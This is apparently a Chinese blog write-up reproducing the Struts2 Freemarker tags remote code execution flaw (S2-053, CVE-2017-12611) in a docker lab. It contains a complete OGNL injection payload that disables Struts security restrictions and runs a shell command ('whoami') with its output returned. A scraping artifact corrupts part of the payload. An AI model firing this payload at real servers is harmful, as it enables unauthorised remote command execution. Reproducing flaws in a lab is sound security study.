2018-08-06-Struts2 Freemarker tags 远程代码执行漏洞(S2-053)

1.漏洞描述：

漏洞名称：Struts2 Freemarker tags远程代码执行漏洞(S2-053)

漏洞CVE编号：CVE-2017-12611

漏洞影响版本：Struts 2.0.1 -Struts 2.3.33, Struts 2.5 - Struts 2.5.10

2.漏洞环境搭建：

首先拉取镜像到本地，如下：

docker pull medicean/vulapps:s_struts2_s2-053

图一

拉取完成以后启动环境，如下：

docker run -d -p 59:8080 medicean/vulapps:s_struts2_s2-053

指定端口为59，前面为物理机端口，后面是容器端口，自己记得。

图二

在浏览器来访问这个端口，进入demo界面。

图三

然后我们直接来随便输入一个值，如下：

图四

直接返回你输入的值。

然后我们输入一个表达式试试

图七

发现被执行了。

直接构造恶意输入，exp如下：

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

图八

该构造exp的含义在有回显的情况下表示当前用户。

至此，复现成功。